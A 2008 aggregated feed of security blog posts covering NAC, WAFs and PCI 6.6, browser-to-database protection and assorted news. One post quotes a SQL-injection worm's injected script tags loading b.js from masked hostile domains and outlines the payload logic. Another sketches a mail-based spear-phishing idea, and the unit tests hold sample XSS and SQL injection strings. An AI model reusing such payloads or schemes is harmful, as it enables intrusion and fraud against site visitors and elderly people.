Saturday, June 28, 2008

Spliced feed for Security Bloggers Network

Maybe the NAC used car salesman can claim them as a customer too? In NAC, quality counts! [StillSecure, After All These Years]

Posted: 27 Jun 2008 11:36 PM CDT

Dark Reading had a good article today about GuideWorks, the TV Guide/Comcast joint venture, and its two-year odyssey with NAC, which finds them finally starting to see some good results. I immediately went to the website of the NAC used car salesman to see if they claimed them as a NAC customer too, but didn't see anything yet. But with those guys you never know.

Seriously though folks, this story is a classic NAC story. GuideWorks had guests and unmanaged users visiting their offices all the time. When they would ask to plug in, they were told sorry, wait till you get back to your hotel. Over time this answer became unacceptable, and they realized they needed to give these people a way to get on the net and get their email while keeping the network secure. This very same need drives many initial NAC deployments.

Like many other NAC customers, they wanted something easy: no major overhead, no network changes, and simple to administer. Again, straight out of the NAC playbook. In the summer of '06 they began a pilot of the Tipping Point NAC product, which is based on the old Roving Planet technology. Now Roving Planet was more of a wireless security company, but near the end they rebranded themselves as NAC, and Tipping Point uses that technology with their IPS devices for enforcement. Best of all for GuideWorks, the price was sub-$10k.

Here is where the other side of NAC comes in. This is what the article says:

While NAC tools are often advertised as plug-and-play, GuideWorks found that the NAC setup required a high level of networking expertise. Fortunately, the Inglewood site had plenty of technical expertise because that's where many of the company's developers are stationed. In addition, GuideWorks put one of its front-desk employees in charge of setting up new accounts. But because her technical background was limited, the company had to walk her through a learning curve.

Now the company is planning to deploy the system at its Radnor office, which will be a bit more challenging since there's less technical expertise there, and that office gets a greater number of visitors. So GuideWorks has been on the search for employees to support the NAC system there. The company expects to have NAC up and running there by the end of the summer.

So two years after the trial began, they are rolled out in one office and have to hire employees to support the NAC system at the next office. This was a problem with many of the failed NAC companies over the last few years, and I think it is the problem with this Tipping Point solution too. Just providing guest access should not be that hard! Yes, the StillSecure Safe Access solution would have been much easier and faster to implement, but to be fair, any of the leading NAC solutions would have been up and running more easily as well.

While this article was supposed to serve as a reference and case study for the Tipping Point NAC solution, it is far from inspiring. If I were a customer looking into NAC, I don't think this would make me run out and look at the Tipping Point solution. The moral of the story is that just because you made a good IPS doesn't mean you have a very good NAC product. When it comes to something like NAC, quality counts, and buying a 2nd tier solution can cost you in time to implementation and total cost of ownership.

Micro-Blogging and Twitter [Donkey On A Waffle]

Posted: 27 Jun 2008 05:55 PM CDT

The jury is still out on Twitter. Micro-blogging fills the times between face to face meetings, major blog posts, emails, instant messages, and phone calls. As if we didn't have enough ways to communicate already, apparently we needed a way to publish "what we are doing" every 10 seconds.

My first thought is "why?!". Do we really need to update everyone out there every time we eat a meal or take a shower? I'm doing my best to keep an open mind and I'm trying to give it a fair go, but I'm just not ready to see the benefit of this new technology. At best Twitter can be used to update people with regards to your current location so they can meet up with you at a local pub. To me it seems like a broadcast based IM system with mappings to SMS phone technologies. Maybe I'm just missing the point of it all.

I'm not even going to get into the privacy issues that are apparent with technologies like this. If people don't keep in mind what they are posting about they are likely to give away far too much information to the world. This is a much bigger problem than just Twitter (Facebook, Myspace, blogs in general, etc).

If you use and actually like micro-blogging technologies like Twitter, please leave a comment and explain why. Help me get into the year 2008.

Week of War on WAF’s: Day 5 — Final thoughts [tssci security]

Posted: 27 Jun 2008 04:17 PM CDT

Did we learn anything about web application firewall technology this week?

I hope so. However, my gut tells me there is an overriding feeling of ambiguity around this technology. People want WAFs, but they don’t know why. Organizations everywhere think this is the best or only short-term answer to the web application security problem.

The PCI SSC, which has set June 30th, 2008 as the deadline for compliance with Requirement 6.6, also appears to be wishy-washy on the whole deal. I read the following two articles this morning about PCI-DSS Requirement 6.6 and the use of web application firewalls. While the titles of the articles make it appear that many are still leaning on or towards WAFs, after reading the information and quotes I think the titles might be misleading.

Web application security experts Mike Andrews and Robert Auger also have some interesting things to say. They seem to be very set on the idea that WAF (with proper blacklists) or VA+WAF (to manage the blacklists) are fair enough temporary solutions until organizations can implement secure coding.

Some interesting things can go wrong during the WAF implementation phase. I can identify the following problem areas that may have many organizations wondering why they went the WAF route:

  1. You might think that a network engineer or network security expert could get up to speed quickly through training or lab-time. However, I think the average time to become a web application security expert is 3-4 years of specialization. Imagine how many developers could have been trained or worked on collaborative processes with IT security in that time period.
  2. Blacklist technology (especially VA+WAF) is going to help with false positives. However, what about general performance problems? If performance or availability issues occur, the first thing thrown out will be the WAF. What good is a device that is constantly removed from the architecture and then only put back in to meet compliance issues?
  3. There is a lot of technology out there to detect specific WAF products. It’s been written about in books. Attack tools such as w3af utilize plugins such as detectWAF. Vulnerabilities exist in WAF products in the same way that they exist in all software. Adversaries are already using this information to their advantage. Using a WAF can indeed make you less secure. In order to provide a product that will protect modern web applications, we must first test the products ourselves. There is more complexity in the average WAF than in the average Intranet web application — who is going to provide the countless hours of secure code review and manual pen-testing needed for these WAF products? Or are we going to use them blindly without considering the consequences?

What are some short-term alternatives?

  1. Multiple WAF solutions — one solution that focuses on “outbound” web traffic, and another that is tuned to your specific application (e.g. language, framework, components in use, et al). If your web application uses well-formed, valid XHTML — the outbound filtering requirement is already fulfilled. Refactoring your content to XHTML is a snap. Many books and tools exist to help in this process (Dreamweaver, xmllint, TagSoup, NekoHTML, and HTML Tidy just to name a few).
  2. A softer, lighter version of Agile/Test-first development practices with basic unit tests that correct input validation issues. This would be equivalent or better than WAF in practice. James Shore discusses how to implement this sort of idea in an article, Continuous Integration on a Dollar a Day.
  3. Even Aspect-oriented programming will show immediate value, as the cost proposition lowers when you already have the existing talent to implement AOP. If you have developers who know AspectJ, input validation routines can be added with point-cuts almost overnight (see the sketch after this list).
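
To make that last point concrete, here is a minimal, hypothetical AspectJ sketch: an aspect that intercepts every call to getParameter() in a servlet application and rejects values outside a whitelist. The aspect name, the whitelist pattern, and the error handling are illustrative assumptions, not code from any product mentioned above.

    // Hypothetical sketch only: whitelist request parameters app-wide.
    import java.util.regex.Pattern;
    import javax.servlet.ServletRequest;

    public aspect InputValidationAspect {

        // Allow only characters we expect in ordinary form fields.
        private static final Pattern SAFE = Pattern.compile("^[\\w .,@-]*$");

        // Match every call to request.getParameter(...) in the application.
        pointcut readParam(ServletRequest req, String name) :
            call(String ServletRequest+.getParameter(String))
            && target(req) && args(name);

        // Validate around the call; reject anything outside the whitelist.
        String around(ServletRequest req, String name) : readParam(req, name) {
            String value = proceed(req, name);
            if (value != null && !SAFE.matcher(value).matches()) {
                throw new IllegalArgumentException(
                    "Rejected suspicious value for parameter: " + name);
            }
            return value;
        }
    }

The point-cut is woven in at compile time, so no application code has to change; tightening or loosening the whitelist is a one-line edit in one file.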

The problem with these three short-term solutions is that they involve talking to your development teams. Do they have a reason to avoid using valid XHTML? Maybe their waterfall mindset precludes them from being able to move to a situation where “building code” is more important than “programming” (although I would argue that it’s a developer’s job to write buildable code).

What I think is most sad about the state of WAF technology is that a single, cheap developer could easily replace all of the normal WAF functionality in the code using basic unit testing. A talented developer who knew AOP could do much more than a WAF, and still at a much lower overall cost. Some organizations that are implementing WAF are having the developers manage the solutions instead of network engineers or IT security. We’re hoping that this situation will allow the developers to think up better ideas as well as learn where their applications are failing.
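
As a rough illustration of the kind of basic unit testing meant here, the sketch below pins down an input validation routine's behavior against classic attack strings. Validator.isSafe() is a hypothetical helper in your own codebase, not a real library API.

    // Illustrative only: JUnit 4 tests for a hypothetical Validator helper.
    import static org.junit.Assert.assertFalse;
    import static org.junit.Assert.assertTrue;
    import org.junit.Test;

    public class InputValidationTest {

        @Test
        public void acceptsOrdinaryInput() {
            assertTrue(Validator.isSafe("jsmith@example.com"));
            assertTrue(Validator.isSafe("123 Main St."));
        }

        @Test
        public void rejectsScriptInjection() {
            assertFalse(Validator.isSafe("<script>alert(1)</script>"));
        }

        @Test
        public void rejectsSqlInjection() {
            assertFalse(Validator.isSafe("' OR '1'='1"));
        }
    }

Run as part of the daily build, tests like these catch validation regressions before an attacker (or a WAF) ever sees them.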

In fact, a non-developer, such as someone in marketing who uses Dreamweaver, could also do almost as much as a normal WAF by saving their content as valid XHTML. This would buy the organization basic application security functionality, which is what WAF also attempts to do.

Summary

We know that WAFs appear to be the easiest answer to PCI-DSS Requirement 6.6.  But what if there were an even simpler answer?  Talk with your QSAC, QSA auditor, and an external third-party such as a web application vulnerability assessor, software risk expert, or strategy consultant about possible compensating controls, such as:

  • Unit testing and integration unit testing for security properties as part of a daily, standard build
  • Aspects for security, written by an internal developer, which can front the web application in a similar way but sit closer to the code
  • Transformation of non-standard HTML to valid XHTML by a web designer or content manager (see the sketch after this list)
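
For that last control, a tool-assisted pass may be all it takes. Here is a sketch using JTidy, the Java port of the HTML Tidy tool mentioned earlier, assuming JTidy is on the classpath; the file names are illustrative.

    // Sketch: convert legacy tag soup to well-formed XHTML with JTidy.
    import java.io.FileInputStream;
    import java.io.FileOutputStream;
    import org.w3c.tidy.Tidy;

    public class XhtmlCleanup {
        public static void main(String[] args) throws Exception {
            Tidy tidy = new Tidy();
            tidy.setXHTML(true);        // emit XHTML rather than HTML
            tidy.setQuiet(true);        // suppress progress chatter
            tidy.setShowWarnings(true); // still report questionable markup

            FileInputStream in = new FileInputStream("legacy.html");
            FileOutputStream out = new FileOutputStream("clean.xhtml");
            tidy.parse(in, out);        // tidied XHTML written to out
            in.close();
            out.close();
        }
    }

A designer can accomplish the same thing interactively by saving as valid XHTML from an editor like Dreamweaver, as noted above.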

If you are going to choose a web application firewall, we suggest:

  • WAF solutions that have been security tested and risk assessed by third parties that specialize in security appliance/product assessments
  • A product that doesn’t affect performance because it only works on outbound traffic (not inbound), or only turns itself on when an attack is in progress
  • Instructional capability and training for the solution is cheap/free, easy to find, and well-documented everywhere

Rich Mogull also has some new suggestions for the future of WAF in his blog post, The Future of Application and Database Security: Part 2, Browser to WAF/Gateway.  It’s also worth a read!

The Future Of Application And Database Security: Part 2, Browser To WAF/Gateway [securosis.com]

Posted: 27 Jun 2008 03:12 PM CDT

Since Friday is usually “trash” day (when you dump articles you don’t expect anyone to read) I don’t usually post anything major. But thanks to some unexpected work that hit yesterday, I wasn’t able to get part 2 of this series out when I wanted to. If you can tear yourself away from those LOLCatz long enough, we’re going to talk about web browsers, WAFs, and web application gateways. These are the first two components of Application and Database Monitoring and Protection (ADMP), which I define as:

Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity.

Browser Troubles

As we discussed in part 1, one of the biggest problems in web application security is that the very model of web browsers and the World Wide Web is not conducive to current security needs. Browsers are the ultimate mashup tool- designed to take different bits from different places and seamlessly render them into a coherent whole. When I first started serious web application programming (around 1995/96) this blew my mind. I was able to embed disparate systems in ways never before possible. And not only can we embed content within a browser, we can embed browsers within other content/applications. The main reason I, as a developer, converted from Netscape to IE was that Microsoft allowed IE to be embedded in other programs, which allowed us to drop it into our thick VR application. Netscape was standalone only, seriously limiting its deployment potential.

This also makes life a royal pain on the security front where we often need some level of isolation. Sure, we have the same-origin policy, but browsers and web programming have bloated well beyond what little security that provides. Same-origin isn’t worthless, and is still an important tool, but there are just too many ways around it. Especially now that we all use tabbed browsers with a dozen windows open all the time. Browsers are also stateless by nature, no matter what AJAX trickery we use. XSS and CSRF, never mind some more sophisticated attacks, take full advantage of the weak browser/server trust models that result from these fundamental design issues.

In short, we can’t trust the browser, the browser can’t trust the server, and individual windows/tabs/sessions in the browser can’t trust each other. Fun stuff!

WAF Troubles

I’ve talked about WAFs before, and their very model is also fundamentally flawed. At least how we use WAFs today. The goal of a WAF is, like a firewall, to drop known bad traffic or only allow known good traffic. We’re trying to shield our web applications from known vulnerabilities, just like we use a regular firewall to block ports, protocols, sources, and destinations. Actually, a WAF is closer to IPS than it is to a stateful packet inspection firewall.

But web apps are complex beasts; every single one is a custom application, with custom vulnerabilities. There’s no way a WAF can know all the ins and outs of the application behind it, even after it’s well tuned. WAFs also only protect against certain categories of attacks- mostly some XSS and SQL injection. They don’t handle logic flaws, CSRF, or even all XSS. I was talking yesterday with a reference customer for one of the major WAFs, and he had no trouble slicing through it during their eval phase using some standard techniques.

To combat this, we’re seeing some new approaches. F5 and WhiteHat have partnered to feed the WAF specific vulnerability information from the application vulnerability assessment. Imperva just announced a similar approach, with a bunch of different partners.

These advances are great to see, but I think WAFs will also need to evolve in some different ways. I just don’t think the model of managing all this from the outside will work effectively enough.

Enter ADMP

The idea of ADMP is that we build a stack of interconnected security controls from the browser to the database. At all levels we both monitor activity and include enforcement controls. The goal is to start with browser session virtualization connected to a web application gateway/WAF. Then traffic hits the web server and web application server, both with internal instrumentation and anti-exploitation. Finally, transactions drop to the database, where they are again monitored and protected.

All of the components for this model exist today, so it’s not science fiction. We have browser session virtualization, WAFs, SSL-VPNs (that will make sense in a minute), application security services and application activity monitoring, and database activity monitoring. In addition to the pure defensive elements, we’ll also tie in to the applications at the design and code level through security services for adaptive authentication, transaction authentication, and other shared services (happy Dre? :) ). The key is that this will all be managed through a central console via consistent policies.

In my mind, this is the only thing that makes sense. We need to understand the applications and the databases that back them. We have to do something at the browser level since even proper parameterization and server side validation can’t meet all our needs. We have to start looking at transactions, business context, and content, rather than just packets and individual requests.

Point solutions at any particular layer have limited effectiveness. But if we stop looking at our web applications as pieces, and rather design security that addresses them as a whole, we’ll be in much better shape. Not that anything is perfect, but we’re looking at risk reduction, not risk elimination. A web application isn’t just a web server, just some J2EE code, or just a DB- it’s a collection of many elements working together to perform business transactions, and that’s how we need to look at them for effective security.

The Browser and Web Application Gateway

A little while back I wrote about the concept of browser session virtualization. To plagiarize myself and save a little writing time so I can get my behind to happy hour:

What we ideally need is a way to completely isolate our content in the browser. One way to do this is session virtualization, pioneered by GreenBorder, who was later acquired by Google (the GreenBorder site is just in support mode now). When a user connects to our site, we push down some code to create a virtual environment in the browser that we strictly control. We wall off that session, which could just be an isolated iFrame in a page, so that it only accesses content we send it. Basically, we break the normal browser model and hijack what we need. This would, for example, help stop CSRF since other browser elements won’t be able to trigger a connection to our application. Done right, it limits man in the middle attacks, even if the user authorizes a bad digital certificate.

To work properly, this needs to be tied to a gateway that controls the session. While we could do it from the web/app server itself, I suspect we’ll see this as a web application firewall feature, just as we see similar features from SSL-VPNs. I think isolated WAFs have a very limited lifespan, but this is exactly the kind of feature that will extend their value. Better yet, we can tie this in to our Application and Database Monitoring and Protection to build a browser-to-database protected path. We can completely track a transaction or piece of content from the database server to the browser and back.

We could even use this to isolate potentially “bad” content in an in-browser sandbox. For example, it could be a way to enable all those social networking widgets in a more controlled way, by locking in potentially bad content instead of only allowing known good.

Will this protect us from keystroke sniffers or a completely compromised host? Nope, but it will definitely help with a large number of our current browser security issues. If we combine it with full ADMP and additional methods like transaction authentication, I think we can regain a bit of control of the web application security mess.

Thus we see one migration path for a WAF. A user goes to connect to the application and hits the WAF, which is now more of a Web Application Gateway. The gateway, like an SSL-VPN, sends the session virtualization code down to the browser. We do this outside of the web application for performance reasons. The secure virtual session is established and the gateway then allows communications with the application behind it.

For things like retail and financial sites that include only limited third party content if any, we can monitor activity from the browser through to the application and work within the isolated session. It both improves our ability to control what’s being sent to the browser, and gives us a higher degree of confidence that what’s coming from the browser is safe. We still validate everything, but since we’re tied to the application itself we can validate in the browser and at the gateway before we even hit the app (and further validate there). Since in a controlled environment we know what transactions should be allowed (or not), we have more ability to detect and block “bad” transactions like SQL injection from the user.

In less controlled environments- think MySpace or Gmail and everything in between- the gateway also becomes a filter for third party content. Like Checkpoint’s new ForceField. The gateway filters out, to the best of its ability, harmful third party content coming from third party sites. Basically, it becomes an SSL-VPN for secure browsing.

This is obviously not viable for all sites due to bandwidth considerations, and in those circumstances we’ll drop this part and stick to the rest of the ADMP stack, or only virtualize our pieces of content knowing the user is at risk for the third party stuff we’re still linking them to.

Future of the WAF, Option 2

I’ve just described a scenario where the WAF extends into a Secure Web Application Gateway that adds virtualization, encryption, and content filtering. That doesn’t mean WAFs won’t also still exist in non-virtualized situations, since there will still be a massive volume of sites out there.

For these sites the WAF continues to progress with deeper application integration and application understanding, and works with the elements I’ll describe later that will be embedded into the applications and databases. Rather than hanging around outside the application with barely any idea what’s going on behind it, the WAF will take its cues from the app, help manage sessions, and monitor activity outside the app to block the few things we know we can pick up at that layer.

Why use the WAF at all? To give us a choke point and offload some of the monitoring and processing that could hurt application performance. Let’s be honest- maybe WAFs will eventually go away, but performance problems alone will probably keep next-gen WAFs viable for a while. There are also plenty of things we can now block before they ever hit the application controls, which, by nature of being integrated at the app level, will be more complex and delicate.

But again, by tightly integrating with our other layers, instead of naively assuming that an external black box will magically solve our problems, we get a much higher level of functionality. Feeding in vulnerability data as we’re just starting to do is a good beginning, but once we plug in deeper to the application and database servers we’ll get entirely new levels of functionality.

Part 2 Conclusions

What I’ve described today is how we can build a (more) trusted path from the browser to the face of the application. WAFs will add gateway capabilities, both protecting the applications behind them and the browsers in front of them. Since this won’t be the right approach in all circumstances, WAFs will also evolve with tighter integration to the application and other ADMP stack components.

Again, this might sound like little more than the usual analyst fiction, but all the components are here today. Also, I don’t expect my predictions to be totally accurate. I’m roughly guessing I’m at 85% or so.

Next week I’ll start digging into the application and database. We’ll talk about application instrumentation, anti-exploitation, DAM, trusted transaction paths, and shared security services.

That’s What I Want [un-excogitate.org]

Posted: 27 Jun 2008 12:08 PM CDT

It started with the online purchasing of movie tickets
Since I’ve been running the NoScript addon in Firefox, I’ve found that pages trying to load remote scripts are much more noticeable. This was particularly the case when, over a month ago, I was purchasing tickets online through one of our local Australian cinema chains (Greater Union) and I ended up on the help page. In this instance, I had already temporarily allowed the primary site in NoScript so I could purchase the tickets (the site needed this functionality to work), but when the help page loaded NoScript advised me that there were another 6 domains with scripts that wanted to run. When I clicked the NoScript button, at least 4 of those other domains did not appear legitimate, such as bin###.com, adw*.com, app##.com.

At the time I didn’t think much of this event and simply closed the help page and continued purchasing my tickets. I was in a rush of course and had to get to the movies to see Iron Man or something. A few days later I checked the page again and this time noticed that the scripts appeared to be pointing to different domains. When reviewing the HTML source it also became apparent that the javascript calls were not likely to be legitimate, as they seemed to be called inside ad-hoc <option> tags. For example:

<option value='cinebuzz_club#Cinebuzz Club<script src=http://www.hl***.com/b.js></script><script src=http://www.bin###.com/b.js></script><script src=http://www.apps##.com/b.js></script><script src=http://www.app##.com/b.js></script>'>Cinebuzz Club

The SQL Injection Worm
A quick Google search for “b.js” had a number of hits, but the article that provided the most information was the SANS Diary on “SQL Injection: More of the Same”. The first instance of this SQL injection worm appears to have been reported by SANS in May. The original summary of the vulnerability, as seen here, describes the javascript as opening a hidden iframe, which in turn opens up other iframes (depending on your browser), eventually trying to download or execute a malicious piece of software.

The current incarnation of the attack appears to be a little more advanced: the malicious domains hosting the b.js file appear to be fast-flux hosted, as written up here, and the content within the subsequent hidden iframe is obfuscated javascript (yay). But using the technique described here with Mozilla’s Rhino (in fact the obfuscated javascript looked really similar), the script eventually exposed the following logic:

  • Set default values for 4 variables
  • Loop through navigator.plugins looking for: QuickTime, Adobe Acrobat, Shockwave Flash
  • For each of the 3 plugins, set a value against one of the first 3 variables, depending on subsequent logic that looks at version numbers for each plugin
  • Check whether video/x-ms-wmv is an enabled plugin type, and set the 4th variable
  • Construct a new target script URL dependent on the above variables, for example: evil##.com/cgi-bin/index.cgi?c82fc0be071f01200077e0ed58020000000002804b628eff00 + var1 + var2 + var3 + var4

I haven’t had much luck in getting the target website to produce anything other than an HTTP 500 response, but I’m assuming that depending on the parameter passed to index.cgi, the server spews out a different exploit or piece of malware.

The Problem
The primary concern I have with this piece of malicious javascript is the fact that Greater Union actively advertises and insists that their customers use the online channel for purchasing tickets. In fact, they’ve made it increasingly difficult to purchase tickets at the cinema itself, because you then lose the ability to choose your seats. The only way to guarantee particular seats is to buy your tickets online. So we’re stuck in a situation where we are urged to purchase tickets online, the only payment method of course is by submitting credit card information, and other portions of the website are hosting malicious javascript injected through an underlying SQL injection vulnerability. How do we know that the ticket-purchasing portion of the website doesn’t have similar vulnerabilities? The short answer is we don’t.

What exacerbates this is the fact that it’s been over a month and the vulnerability has not been fixed. In fact, if the target domains keep on changing, it implies that the site keeps on getting exploited. The “baddies” are updating their code, updating the malicious payloads, and are re-exploiting this site over and over again. This certainly impacts my trust in them as a provider to keep my personal and credit card information protected. If their site is susceptible to a SQL injection worm, then someone doing targeted hacking against the site is likely to uncover all sorts of information.

What can we do?
Moving this forward and trying to provide some sort of assistance, a couple of things I would recommend if I were in their shoes would be:

  • Firstly, I would find the vulnerability and patch/fix it. (There’s been a lot of talk about Scrawlr recently; that’s probably a good place to start.)
  • Secondly I would review the rest of the code base for any similar issues.
  • Thirdly, start to put some strategy around embedding security within your development lifecycle (SDL/SDL-IT/Whatever), if it isn’t already in place.

The hidden gas tax [StillSecure, After All These Years]

Posted: 27 Jun 2008 12:03 PM CDT

 
We all hate paying $75 or more every time we fill up our gas tanks. When we see gas and oil prices hitting new highs (it seems to happen every day) we grimace and think about how much this is going to cost us as part of our weekly gas bills.  We get even more upset when the utility bills come and we see our summer time electric bills going through the roof because of fuel surcharges.

What about the price of food and other goods?  Have you noticed how much they are going up?  Bananas were 49 cents a pound and are now 69 cents a pound.  That is a huge increase.  Our government says core inflation is not going up outside of energy costs and I am not sure I believe that. We are seeing huge increases in rice, wheat and other staples.  But gas prices are a hidden tax on our economy across the board.

Have a look at the UPS receipt for a package that was shipped out to me.  From a base price of about $22.00, fuel surcharges add another $10 to the bill. That is almost a 50% tax for fuel!  Add 50% to the cost of everything you buy and it is easy to see how this energy crisis is pushing us all to the breaking point.

We need a "send a man to the moon" effort to break free of oil and move to clean renewable, cheap energy now!

Here comes a big plate of suck [Vitalsecurity.org - A Revolution is the Solution]

Posted: 27 Jun 2008 11:52 AM CDT

I love me some useless "see lots of secret stuff on Myspace" nonsense. Whether it's lines of code, programs or websites, 99% of them are rubbish.

Here's one I saw being pimped on a site the other day:


Click to Enlarge

See if you can spot the faintly comical screwup in the next screenshot:


Click to Enlarge

.....hahaha.

There's quite a few sites out there like this one, and all of them eventually just dump you on a page imploring you to download Firefox. However, it seems they can't even get that right, because on all of the sites I've seen so far there's no download link to click.

Did I hahaha yet?

Breach got you down? [Branden Williams' Security Convergence Blog]

Posted: 27 Jun 2008 11:00 AM CDT

Well, it has happened again. I received a rather menacing looking note in the mail today. You know, one of those heavy stock sealed letters that has the perforated edges? Yeah. That kind.

Inside it looks like my information is on a lost tape from a bank. The funny thing is, I don't remember banking with this institution... ever. I have a feeling that one of the brokerage firms I use (or used) was backed by this institution, but nevertheless, I thought of an interesting type of phishing attack that I bet would work. When I looked through this notice, it did appear to have a corresponding breach on PrivacyRights.org. I have already placed my fraud alerts, so I should be good.

But what if it didn't? If I were to target specific individuals (i.e., spear phishing) and tell them that their information was compromised from a large bank and provided a number for them to call for more info, would they readily give me enough information to steal their identity? I think people have started to be wary about clicking on things or giving out information over email, but what about through the mail? Sure it won't have the same reach that electronic attacks will, but how much more lucrative could the loot get?

My thoughts are that it would work remarkably well against those individuals who don't have lawyers reading their mail, and especially some of the elderly population.

We're so big and other marketing games [StillSecure, After All These Years]

Posted: 27 Jun 2008 10:41 AM CDT

Andy Jaquith had a good post up that I first heard about from Mike Rothman's blog. Andy, fresh off attending the Symantec Vision conference, laments the obligatory "we're so big" slides that find their way into almost every deck you see. Whether it is for analysts, as Andy says, or for customers or partners, from the biggest to the smallest, companies seek to show how good they are by how big they are. Numbers of customers, nodes, sensors, yada, yada. Usually these "we're so big" slides are followed by the obligatory circular diagrams that show the "life cycle" of the company's products or services being complete. After a while, you've seen one, you've seen them all.

But let's face it, even for some of you men out there who may be resisting, size does matter! No one wants to say they don't have the scale, and success breeds success. It is just a fact of marketing. You will feel more comfortable if you see so many others (even brands you know) picking the same solution you are looking at. You feel good knowing that your vendor has an army of machines and/or people watching your back. Sounds better than 3 guys in a garage for sure.

It is all part of the marketing game. Those same rules say that if you repeat a story enough times, whether it is true or not, eventually people believe it. The bigger the lie, the more times you repeat it, the more people will believe it. But that should not stop others from pointing out the facts and doing their best to call out those who just cross the line with marketing claims that are not true.

Here is another pet peeve of mine. Why do analysts base their market size numbers on what vendors tell them they do in revenue? With the past performance of some of these vendors, I wouldn't put much weight into what they say they do for revenue. I think analysts need to show market size independent of vendor revenue reports unless they are in fact audited or somehow verified.

SUN: Solaris 10 Multicast Critical Vulnerability Revealed [Infosecurity.US]

Posted: 27 Jun 2008 09:11 AM CDT

Sun Microsystems, Inc. (NasdaqGS: JAVA) has announced a critical vulnerability (and the fix) for a multicast flaw in their Solaris 10 operating system, considered by many to be one of the most secure OSes available. Sun also credits Tobias Klein for discovery of this exploitable vulnerability and notifying the company of the issue. The original discovery [...]

FBI: Airlines Plead Guilty and Pay Criminal Fines [Infosecurity.US]

Posted: 27 Jun 2008 08:13 AM CDT

While not necessarily Information Security related, today brings news, in the form of an announcement by our Federal Bureau of Investigation, of several major airlines pleading guilty to anti-trust charges for their misguided and illegal attempts to fix prices on cargo transport. Kudos to our FBI in their investigation, and let’s not forget the Department [...]

Discovered: Cisco Unified Communications Manager DoS & Authentication Bypass Flaws [Infosecurity.US]

Posted: 27 Jun 2008 08:13 AM CDT

Cisco Systems, Inc. (NasdaqGS: CSCO) has revealed recently discovered vulnerabilities plaguing their Unified Communications Manager product. This time, a rather serious Denial of Service exploitable flaw, coupled with an equally damaging Authentication Bypass exploit. On the plus side, Cisco is certainly recognized, around here at least, as being significantly committed to responsive action when faced [...]

Information Requests for RSA Conference [RSA Conference - Blog]

Posted: 27 Jun 2008 08:07 AM CDT

UK: 25 Million Lost Child Care Records Spurs New Whitehat Program [Infosecurity.US]

Posted: 27 Jun 2008 07:50 AM CDT

News has surfaced of a sea change in information security testing procedures, using whitehat hacking resources, from the government of the United Kingdom. The report of the new measures comes from Chris Williams at The Register. Spurred on by the stunning notification of over 25 million lost child care records, Cabinet Secretary Gus O’Donnell is betting [...]

Leaves from the Tree 2008-06-27 [Birchtree Blog]

Posted: 27 Jun 2008 07:07 AM CDT

My, oh my. What did we have this week...

xkcd (the world's best web comic) had a story on why Wi Fi holes may be useful: "Road Rage".

Security - who needs it? - Yes, we've all been there.

And last but not least, it's Bill Gates' last working day at Microsoft today. Definitely a man who has done a lot for our industry. How time passes! 1978 - 2008. Somehow reminds me of these folks. (By the way, wonder how Steve Jobs is doing?)

Download Hyper-V RTM for Windows Server 2008 [Jeff Jones Security Blog]

Posted: 26 Jun 2008 07:02 PM CDT

I converted my office fileserver to Windows Server 2008 (WS2008) a while back and I've never been happier - WS2008 is my favorite product ever.  Nicely modular, pretty much everything turned off by default, and some great tools for enabling just the components you need for a particular role.

There is one more step I've been wanting to take and that is to enable the Hyper-V role and convert my fileserver over to just one virtual machine on the box, so I can set up other VMs on the same box.  Today, I was excited to see Microsoft Releases Hyper-V on CNET.  Here is a summary of the key links (note that it is only available for the 64-bit versions of WS2008):

Check back with me and I'll let you know how things go and share any tips I have for what to do or not do, as well as my review of how easy/hard it is.

Regards ~ Jeff

Why go to Black Hat? [CultSEC Blog]

Posted: 26 Jun 2008 04:32 PM CDT

The Black Hat Conference has been going on for years. For me, I've always said I would like to get there some day. Instead, I've always opted for making it to the RSA conference because the companies I've worked for were willing to send me to one or the other each year.

I used to believe the Black Hat conference was on the forbidden list for those of us certified with CISSP. Maybe this was true. I did a quick scan of the ethics policy on the www.isc2.org website. It touches on many points which could be argued for and against when deciding to attend conferences like Black Hat. I would argue for attending, because I've always believed I might actually learn something about the tips and tricks I'm trying to protect against.

I also believed Black Hat was more technical in nature. As I continue in my career, where I've been managing for a good number of years, I drift further away from solid keyboard interactions. I did notice in this year's tracks there are topics for folks like me. Even if I'm not a hard-core, hands-on technical professional, it is still good to attend classes that are. For me it keeps me plugged in with how things work at that level, which helps me understand appropriate needs in managing security analysts.

Nowadays I don't worry as much about maintaining the status of my certifications. I always do my best to operate in an ethical manner and don't think attending venues such as Black Hat would cause me to do something unethical.

At any rate, I am not planning to be there this year either. I've been to RSA. Perhaps next year, I'll opt for the Black Hat instead.

GCN: New Security Certification Rules [Infosecurity.US]

Posted: 26 Jun 2008 04:09 PM CDT

Personnel granted paper certifications by groups like the ISC2 could be (I would say will be) impacted by newly codified, federally mandated certification requirements. Via GCN.

CCTV - the secret [Roer.Com Information Security - Your source of Information Security]

Posted: 26 Jun 2008 02:21 PM CDT

Bruce offers a piece well worth reading on CCTV today.

MindshaRE: Adding IDA to Explorer Context Handler [DVLabs: Blogs]

Posted: 26 Jun 2008 02:04 PM CDT

Posted by Cody Pierce

In this week's MindshaRE we will show you how to add IDA to the right-click context menu of Windows Explorer.  This is handy for quickly disassembling .dlls and .exes.

MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through our blog history.

When disassembling binaries in IDA most people will go through a couple of steps to load a new binary.  In the past I would first open IDA, locate the binary I want to disassemble, and drag it from the explorer window into the IDA MFC.  This is fine, but we are always looking for a more efficient way to work.

Adding IDA to the right-click context menu in Explorer is pretty simple.  This allows you to right-click any binary type you have set up for IDA to handle and simply click "IDA" or whatever you want to label it.  By doing this we can disassemble target binaries with a few clicks.  There are several ways we can achieve this, but I will present the one I use.  Here are the steps to accomplish this (a sample .reg file follows the list).
  1. Open "regedit.exe"
  2. Open the key "HKEY_CLASSES_ROOT"
  3. Locate the file extension class you want.* ("dllfile" and "exefile")
  4. Open the sub key "shell"; if the key does not exist, create it
  5. Create a new key
  6. Give it the text label you want displayed when you right click the file type
  7. Create another key under the label and name it "command"
  8. Open the "(Default)" key under the newly created label key
  9. Add the path to your installation of IDA Pro's idag.exe binary in double quotes followed by "%1"
  10. Repeat for any other file extensions you want
  11. Close "regedit.exe"
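
If you prefer, the same configuration can be imported from a .reg file. The sketch below is illustrative only: the menu label is arbitrary, and the path to idag.exe is an assumption you must adjust to match your own IDA Pro installation.

    Windows Registry Editor Version 5.00

    ; Illustrative .reg equivalent of the manual steps above.
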